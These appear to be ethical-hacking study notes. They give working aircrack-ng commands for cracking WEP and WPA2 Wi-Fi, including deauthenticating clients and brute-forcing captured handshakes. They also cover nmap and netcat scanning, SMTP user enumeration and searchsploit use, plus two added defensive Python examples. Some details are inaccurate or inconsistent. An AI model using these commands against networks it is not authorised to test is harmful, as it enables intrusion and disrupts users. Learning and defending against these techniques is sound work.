Cyber Security Notes

Cracking WEP: sudo -i, then airodump-ng --band b wlan0

Copy the specific BSSID: airodump-ng --bssid {pastehere} --channel {specific_cha} --write wephack wlan0

Fake authentication / ARP replay attack: airodump-ng --bssid {pastehere} --channel {specific_cha} --write wephack wlan0 'first run this command to collect the packets'

aireplay-ng --fakeauth 0 -a {pastemachere} -h {pastewirelessmachere} wlan0 'run ipconfig to find the 12-hex-digit MAC address of the wireless adapter and change - to :'

aireplay-ng --arpreplay -b {pastemachere} -h {pastewirelessmachere} wlan0 'same command with small changes'

aircrack-ng fakeauth-02.cap

Cracking WPA2:

Capture the 4-way handshake: knock a user off the network so the client reconnects, then recover the credentials:

airodump-ng --bssid {pastehere} --channel {specific_cha} --write capturehandshake --band a wlan0 'first run this command to collect the packets; wlan0 is the wireless interface'

aireplay-ng -0 0 -a {router-mac} -c {client-mac} -D wlan0 '-0 0 selects the deauthentication attack'

Create a wordlist with crunch to brute force the password: crunch 9 9 {possible-chars} -t h@@@@@@@z -o wordlist 'the last part is a pattern: crunch swaps characters into the @ positions and writes the results to the wordlist file'

aircrack-ng capturehandshake-01.cap -w wordlist 'aircrack-ng tries each word from the wordlist against the captured handshake'
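The detection-side counterpart of the deauthentication step above, added here as an example (it is not part of the original notes): a wireless IDS counts deauth frames per claimed transmitter in a sliding window and alerts when one address floods a client. The frame records, MAC addresses and thresholds are constructed for the demonstration; a real deployment would feed it frames decoded from a monitor-mode capture.

```python
"""Flag deauthentication floods in 802.11 management-frame records.

Added example, not part of the original notes. It assumes frames have already
been reduced to (timestamp, subtype, transmitter MAC, receiver MAC) tuples,
for instance exported from a monitor-mode capture; every record below is
constructed for the demonstration.
"""
from collections import defaultdict

AP_MAC = "aa:bb:cc:dd:ee:01"      # constructed access point address
CLIENT_MAC = "11:22:33:44:55:66"  # constructed client address

# Constructed sample: two beacons, one ordinary deauth from another station,
# then 12 deauths in under half a second that claim to come from the AP and
# target one client (the pattern a "-0 0" style deauth tool produces).
SAMPLE_FRAMES = (
    [(0.0, "beacon", AP_MAC, "ff:ff:ff:ff:ff:ff"),
     (0.1, "beacon", AP_MAC, "ff:ff:ff:ff:ff:ff"),
     (0.5, "deauth", "aa:bb:cc:dd:ee:02", CLIENT_MAC)]
    + [(1.0 + i * 0.04, "deauth", AP_MAC, CLIENT_MAC) for i in range(12)]
)


def deauth_floods(frames, window=1.0, threshold=10):
    """Return {transmitter MAC: peak deauth count inside any `window` seconds}
    for every transmitter whose peak reaches `threshold`.

    A healthy network produces occasional deauth/disassoc frames; dozens per
    second from one address aimed at one client is the pattern to alert on.
    The sender address is easily spoofed, so the count is keyed on the
    claimed transmitter and is not proof of who the real sender is.
    """
    times_by_src = defaultdict(list)
    for ts, subtype, src, _dst in frames:
        if subtype == "deauth":
            times_by_src[src].append(ts)

    flagged = {}
    for src, times in times_by_src.items():
        times.sort()
        start = 0
        peak = 0
        for end, ts in enumerate(times):   # sliding window over sorted timestamps
            while ts - times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[src] = peak
    return flagged


if __name__ == "__main__":
    for mac, count in deauth_floods(SAMPLE_FRAMES).items():
        print(f"ALERT: {count} deauth frames within 1s claiming to be from {mac}")
```

The legitimate single deauth from the second station stays below the threshold, while the burst that spoofs the AP's address is reported; tuning `window` and `threshold` to the site's normal roaming behaviour is what keeps the alert useful.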

PASSIVE & ACTIVE RECONNAISSANCE:

  • This section covers information gathering on the target system, the first phase of ethical hacking.

STEPS:

  • gather information
  • determine the network range
  • identify active machines
  • discover open ports and access points; fingerprint the operating system
  • uncover services on ports
  • map the network

PASSIVE RECON: get information without connecting to the target; use public (open source) data to learn more, which keeps you from being detected

ACTIVE RECON: use tools such as scanners to get more data; this exposes you to being noticed.

recon-ng - powerful recon tool for pen-testing. typically the first tool used; it gives data on IP addresses, location, account naming conventions, users, email addresses, passwords and more.

  • git clone the recon-ng repository,

run it and enter these commands:

  • ./recon-ng 'enters the recon-ng console'
  • help 'shows the documentation'
  • marketplace search 'lists the available modules'

whois

  • another passive recon tool on Kali Linux; it can give information on a domain: its registrar, name servers, DNS security, owner and registration details.

whois google.com

DNS Enumeration:

  • the tool is dnsrecon.

dnsrecon will enter you into

searchDNS.netcraft.com DNS information:

  • go to the browser, open searchDNS.netcraft.com and search for msn; it will give you information on msn

Google Hacking:

  • using the Google Hacking Database to find information or specific file types.

Shodan.io:

WWW.SHODAN.IO

  • also known as the hackers' Google; it has information about almost every device that is connected to the internet.
  • you can find vulnerabilities in targets with Shodan, even known ones discovered through OSINT

securityheaders.com: www.securityheaders.com

  • checks whether a website has its security headers set up correctly.
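The kind of check the securityheaders.com service performs, written out as an added example that is not the service's own code: parse a raw HTTP response, list the hardening headers that are absent and flag a Server header that discloses a version. The expected-header list follows common guidance and the response below is constructed, so nothing here touches the network.

```python
"""Audit the security headers in a raw HTTP response.

Added example; it is not the securityheaders.com service and does no network
access. The expected-header list reflects common hardening guidance, and the
sample response below is constructed for the demonstration.
"""

# Headers a hardened site is expected to send, and why each one matters.
EXPECTED = {
    "strict-transport-security": "forces HTTPS on repeat visits",
    "content-security-policy": "limits where scripts and resources may load from",
    "x-content-type-options": "stops MIME sniffing (value should be nosniff)",
    "x-frame-options": "blocks clickjacking by refusing to be framed",
    "referrer-policy": "limits URL leakage to third parties",
}

# Constructed sample: HSTS and nosniff are present, three headers are absent,
# and the Server header leaks a version string.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: nginx/1.18.0\r\n"
    "Strict-Transport-Security: max-age=31536000; includeSubDomains\r\n"
    "X-Content-Type-Options: nosniff\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "\r\n"
    "<html><body>hello</body></html>"
)


def parse_headers(raw_response):
    """Return {lower-cased header name: value} from a raw HTTP/1.x response."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    headers = {}
    for line in head.split("\r\n")[1:]:        # skip the status line
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def audit(headers):
    """Return {"missing": [header names], "warnings": [other findings]}."""
    missing = [name for name in EXPECTED if name not in headers]
    warnings = []
    xcto = headers.get("x-content-type-options", "").lower()
    if xcto and xcto != "nosniff":
        warnings.append(f"x-content-type-options is {xcto!r}, expected 'nosniff'")
    server = headers.get("server", "")
    if any(ch.isdigit() for ch in server):
        warnings.append(f"server header discloses a version: {server}")
    return {"missing": missing, "warnings": warnings}


def report(raw_response):
    """Human-readable summary of the audit for one response."""
    result = audit(parse_headers(raw_response))
    lines = [f"missing {name}: {EXPECTED[name]}" for name in result["missing"]]
    lines += [f"warning: {w}" for w in result["warnings"]]
    return lines or ["all expected security headers present"]


if __name__ == "__main__":
    print("\n".join(report(SAMPLE_RESPONSE)))
```

Header names are compared case-insensitively because HTTP allows any casing; the values of CSP and HSTS need their own policy checks, which this example leaves out.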

SSL Labs:

www.ssllabs.com

  • tool that tests whether a server's SSL settings are correctly configured, for example whether it still accepts vulnerable TLS versions.

pastebin.com:

  • a place where people post random things online, including sensitive information such as email addresses, passwords and data from past breaches.
  • search for the client's domain and names to check that they have not been breached.

ACTIVE RECONNAISSANCE TOOLS:

NMAP:

  • this is a port scanner: it finds open ports and identifies the operating system and services running on devices.

    nmap {ipaddr} -sS 'performs a SYN scan; -sT performs a full TCP connect scan, and -p 1-65535 covers all ports'
    sudo nmap {ipaddr} -sV -p 1-65535 --open -vv 'shows the service and version running on each open port; -vv gives very verbose output'
    sudo nmap {ipaddr} -sV -p 1-65535 --open -vv -oN /readme.txt '-oN writes the output to the readme file'
    sudo nmap {ipaddr} -sU -p 1-65535 --open -vv -oN /readme.txt 'UDP service scan'
    sudo nmap {ipaddr} --script smb-os-discovery 'this script looks for the Samba/SMB service and its OS details'
    nmap --script-help dns-zone-transfer 'gives you documentation on how to use that script'
    ls /usr/share/nmap/scripts 'lists the available scripts'

netcat

  • establishes remote connections to a target, scans ports, and listens for connections coming into your system.

    nc -nvv -w 1 -z {ipaddr} 1-100 '-w 1 times out after one second; -z scans the port range without sending data, so it runs faster'
    nmap -v -p 139,445 -oN readme.txt {ipaddr} 'run verbose and also specify ports'
    nc -nlvp {port} 'listen on a port with verbose output'

SMB Enumeration:

  • Server Message Block enumeration is key to information gathering.
  • it is typically used for file transfer over ports 139/445 and is easy to exploit
  • on some devices you can own the entire system.
  • nmap can also be used against SMB.

NFS Enumeration:

  • Network File System; gather its exported shares for exploitation.

    nmap -sV -p 111 -vv {ipaddr} --script rpcinfo 'this is the NFS/RPC scan'

Nikto

  • finds vulnerabilities in servers and web applications.

Sparta:

  • another tool that combines many tools into one interface for faster, more automated information gathering.
  • some of the included tools are nikto, hydra, nmap and a screenshot tool.
  • runs a port scan, web app scan and brute force just by giving it the IP address.

smtp Enumerations:

  • Simple Mail Transfer Protocol runs over port 25 and, when open, can be used to gather information

    nc -nv {ipaddr} 25 'connect to port 25', then VRFY root 'if something comes back it means the account exists'

openVAS vul scanner:

  • an open source vulnerability scanner that is free but not as robust as Nessus; it must be set up correctly to work well

Launching an attack

5 phases of attack:

  • Reconnaissance

    passive - indirect interaction; active - connection-based interaction

  • Scanning

    gathering information, mapping the network/system out and seeing how the parts are connected, for example by department.

  • Gaining Access

    when the damage is done and permissions are obtained to do certain things. Architecture, configuration and skills determine how deep they can go.

  • Maintaining Access

    removing the evidence of the intrusion; a Trojan horse is kept to repeat access over time, or rootkits are used to regain access and transfer valuable information and permissions. Use honeypots to trap intruders.

  • Covering Tracks

    Trojaned binaries such as ps or netcat are used to hide the intrusion. steganography - hiding data in other data, like hiding an image in sound; tunneling - taking advantage of a transport protocol by wrapping another protocol inside it or abusing an existing connection.

Social Engineering:

  • manipulating users into revealing confidential information.
  • phishing - gathering information via SMS or email to make them spill the beans.
  • watering hole - planting malicious code on a site the user visits a lot
  • pretexting - catfishing a user to get private information

Taking advantage of telnet:

  • remote management service that runs on port 23. it was replaced by SSH due to its lack of encryption.
  • we can use Wireshark to capture the packets from that connection and see the credentials.

    sudo wireshark 'select the interface for your IP address and subnet and start listening'
    sudo apt install telnet
    telnet {ipaddr} 23

After finding the open ports and running services, go to Exploit Database and search for the service and how it is typically exploited; this is the pentester's documentation search engine.

getting exploits from Searchsploit:

  • the list of exploits shows names and file paths.

    searchsploit -m filename.ext '-m copies the exploit file into your current directory; also check whether the exploit is remote or local'
